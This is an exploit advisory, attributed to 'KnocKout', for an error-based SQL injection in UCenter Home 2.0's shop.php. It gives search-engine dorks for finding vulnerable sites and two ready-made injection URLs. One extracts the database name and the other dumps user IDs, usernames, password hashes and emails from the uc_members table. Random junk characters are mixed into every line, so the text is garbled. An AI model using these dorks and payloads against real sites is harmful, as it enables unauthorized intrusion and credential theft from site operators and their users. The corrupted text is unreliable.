* r3 i7 T6 A5 ^9 s__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__
3 h; q: L. x3 i# P8 X' T. I; H4 s
' A; M) {! M, I' v; `+ z: T9 ?1 L : c" v3 G, N' [, a" A7 X
; }+ Y( x$ ]. s1 X4 g1 c5 a2 p2 L*/ Author : KnocKout $ {7 m% l# d6 p9 C1 q* }$ R- l
! [. J8 w/ ~- p: D2 [* M*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers
, ^; j" _0 ?& h) Z5 Q H5 \2 T/ x3 i2 u- B* [
*/ Contact: knockoutr@msn.com ' @4 v8 b' z' j! C. M$ _) M1 N' z
9 i- O0 H* P* ]% B9 J0 H3 {$ b6 A/ A*/ Cyber-Warrior.org/CWKnocKout
) `& P5 y: K3 Y. z6 e" |3 y) D4 p& \1 F q
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 W' d# s% R0 e) M
( W. x2 _! r# cScript : UCenter Home R1 l% }4 u2 U P$ h: G
$ l# W! O! {- Z0 ]. O' {Version : 2.0 ) b( ?) X: P% S4 B. Q: n% Y& N
* x7 P) t* ?/ U" |/ l1 NScript HomePage : http://u.discuz.net/ 7 l- D# C$ A4 N* v1 v
$ G8 c$ |! X R6 N( v__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== + R, ~+ F/ E3 u) R
# R+ u. g9 I' ZDork : Powered by UCenter inurl:shop.php?ac=view ( ~8 s, x& Y% l. |) i- `( S% ?3 T
* o# A6 R2 b$ k1 g/ [" {) BDork 2 : inurl:shop.php?ac=view&shopid= 1 d0 H( Z! M; [( s& M( o
+ j7 K4 V( k2 y9 I
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
0 e' @& e f$ T5 z2 g
- N% q+ d; e. h( r& N, iVuln file : Shop.php
7 \3 j/ `7 r; ?! c( j
4 v2 O: ~7 y! ]! mvalue's : (?)ac=view&shopid=
' c6 H5 V# I" H% S/ B; [# y
% I0 B1 m; g- s! H* n3 }( _Vulnerable Style : SQL Injection (MySQL Error Based)
* ~2 `! [0 K1 g- y4 Q$ b
. ]3 o% m; k \Need Metarials : Hex Conversion
# }2 g" W4 }6 z
8 e" l) ~# i9 ~2 I, ]: ~__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
7 ?5 [# U( q( k
9 Q f" q2 i# h2 A5 eYour Need victim Database name. , p* V3 R7 j! Y+ k- g9 e; n
( T. i: Y3 [# V
for Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 : n8 m5 e1 K }7 B6 R
# ]: t3 B# e! ^: I* ]" x..
: A( j9 K; z$ R% {. E# {" l" c6 U' \9 x* Q+ F. q, t6 t; p( ]
DB : Okey. % i: S4 |4 U. Z5 P
- R, D5 @- I" }3 A7 ?8 q
your edit DB `[TARGET DB NAME]` ) V' v, K4 ^& {- x4 S( J8 q
) O a/ ^0 d5 C1 W3 L; a
Example : 'hiwir1_ucenter'
3 j; t+ A2 b. Z' N8 M: r2 k/ m
Edit : Okey.
9 v; a( W. c; O8 _& y; N9 X
$ e; }8 i4 u) ^' c4 Q7 C3 {' BYour use Hex conversion. And edit Your SQL Injection Exploit.. ; B/ i9 p a- w
3 u; B3 T8 |: f& z3 r4 K! C6 P& k: T
8 ?( }. s/ A& g3 o$ }
) H: W" y& V; y2 aExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1 / k" X9 }. d4 N4 W% n8 S4 A
|